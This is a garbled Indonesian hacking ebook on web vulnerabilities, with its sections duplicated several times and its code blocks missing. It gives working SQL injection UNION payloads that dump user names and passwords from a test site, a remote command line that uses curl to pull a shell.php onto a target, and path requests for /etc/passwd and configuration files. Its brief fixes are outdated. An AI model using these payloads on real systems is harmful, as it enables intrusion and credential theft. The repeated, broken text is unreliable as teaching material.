Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users
0x03 - SQL Injection
Injeksi SQL Injection
Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)
Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--
Maka akan muncul column yang ada
Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name
0x03 - SQL Injection
Injeksi SQL Injection
Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--
Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--
Maka akan muncul data pada column tersebut
Data Column Uname testPass test
0x03 - SQL Injection
Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi
Menambahkan fungsi mysql_real_escape_string pada parameter id
Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query
0x04 - Remote Code Execution
Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x03 - SQL Injection
Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini
Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah
Mengapa bisa berubah
Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo
Query SQL diatas akan berubah menjadi
Maka akan menyebabkan error atau vulnerability pada query SQL
0x03 - SQL Injection
Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +
http127001postphpid=[Query]
Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=
Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--
Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11
0x03 - SQL Injection
Injeksi SQL Injection
Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()
Maka akan muncul tables yang ada
Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users
0x03 - SQL Injection
Injeksi SQL Injection
Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)
Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--
Maka akan muncul column yang ada
Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name
0x03 - SQL Injection
Injeksi SQL Injection
Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--
Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--
Maka akan muncul data pada column tersebut
Data Column Uname testPass test
0x03 - SQL Injection
Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi
Menambahkan fungsi mysql_real_escape_string pada parameter id
Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query
0x04 - Remote Code Execution
Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x03 - SQL Injection
Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +
http127001postphpid=[Query]
Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=
Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--
Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11
0x03 - SQL Injection
Injeksi SQL Injection
Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()
Maka akan muncul tables yang ada
Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users
0x03 - SQL Injection
Injeksi SQL Injection
Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)
Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--
Maka akan muncul column yang ada
Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name
0x03 - SQL Injection
Injeksi SQL Injection
Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--
Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--
Maka akan muncul data pada column tersebut
Data Column Uname testPass test
0x03 - SQL Injection
Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi
Menambahkan fungsi mysql_real_escape_string pada parameter id
Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query
0x04 - Remote Code Execution
Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x03 - SQL Injection
Injeksi SQL Injection
Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()
Maka akan muncul tables yang ada
Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users
0x03 - SQL Injection
Injeksi SQL Injection
Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)
Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--
Maka akan muncul column yang ada
Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name
0x03 - SQL Injection
Injeksi SQL Injection
Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--
Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--
Maka akan muncul data pada column tersebut
Data Column Uname testPass test
0x03 - SQL Injection
Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi
Menambahkan fungsi mysql_real_escape_string pada parameter id
Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query
0x04 - Remote Code Execution
Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
